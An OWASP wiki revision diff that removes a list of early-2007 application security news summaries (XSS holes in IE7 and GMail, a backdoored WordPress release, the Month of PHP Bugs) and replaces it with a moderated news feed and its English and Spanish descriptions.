|
|
(14 intermediate revisions by 5 users not shown) |
Line 1: |
Line 1: |
− | <!-- please add stories to the main Application Security News page --> | + | <IfLanguage Is="en"> |
| + | This news feed is moderated by OWASP and will feature high-quality posts focused on application security that advance the field, provide useful insight, or are useful educational resources. |
| + | </IfLanguage> |
| + | <IfLanguage Is="es"> |
| + | Estas noticias son moderadas por OWASP y mostrarán publicaciónes de alta calidad enfocadas en seguridad de aplicaciones de avanzada, proveen razonamiento profundo o son recursos educativos útiles. |
| + | </IfLanguage> |
| | | |
− | ; '''Mar 15 - [http://aviv.raffon.net/2007/03/14/PhishingUsingIE7LocalResourceVulnerability.aspx local IE 7 phishing hole]'''
| + | <owaspfeed/> |
− | :Provides a nice proof of concept with CNN (Link at the bottom). "Internet Explorer 7.0 is vulnerable to cross-site scripting in one of its local resources. In combination with a design flaw in this specific local resource it is possible for an attacker to easily conduct phishing attacks against IE7 users." CNET News also picked this up as a [http://news.com.com/2100-1002_3-6167410.html?part=rss&tag=2547-1_3-0-20&subj=news story].
| |
− | | |
− | ; '''Mar 14 - [http://mybeni.rootzilla.de/mybeNi/2007/gmail_information_disclosure/ GMail Information Disclosure]'''
| |
− | :Only a tiny XSS hole to demonstrate a disclosure proof-of-concept through AJAX/JSON of all contacts you ever mailed. If a domains covers a lot of functionality and users, one XSS can be devastating. Remember the Google Desktop vulnerability. What is frightening is that it took Beni only ~5 minutes to find a XSS hole.
| |
− | | |
− | ; '''Mar 8 - [http://myappsecurity.blogspot.com/search/label/reflection Anurag Agarwal's reflection series]'''
| |
− | :Anurag Agarwal maintains an interesting [http://myappsecurity.blogspot.com/ blog] on Web Application Security. Recently he started a serie of reflections on people active in this field. Up until now he covered Amit Klein, RSnake, Jeremiah Grossman, Ivan Ristic and Sheeraj Shah. Lot's of good pointers to web application research of the last years!
| |
− | | |
− | ; '''Mar 2 - [http://wordpress.org/development/2007/03/upgrade-212/ Wordpress (popular blog software) backdoored]'''
| |
− | :"Long story short: If you downloaded WordPress 2.1.1 within the past 3-4 days, your files may include a security exploit that was added by a cracker, and you should upgrade all of your files to 2.1.2 immediately."
| |
− | | |
− | ; '''Mar 1 - [http://www.php-security.org/ the Month of PHP Bugs "formerly known as March"]'''
| |
− | :"This initiative is an effort to improve the security of PHP. However we will not concentrate on problems in the PHP language that might result in insecure PHP applications, but on security vulnerabilities in the PHP core."
| |
− | | |
− | ; '''Feb 26 - [http://www.securityfocus.com/infocus/1888 Building Secure Applications: Consistent Logging]'''
| |
− | :SecurityFocus article, "This article examines the dismal state of application-layer logging as observed from the authors’ years of experience in performing source code security analysis on millions of lines of code."
| |
− | | |
− | ; [[Application Security News|Older news...]]
| |
This news feed is moderated by OWASP and will feature high-quality posts focused on application security that advance the field, provide useful insight, or are useful educational resources.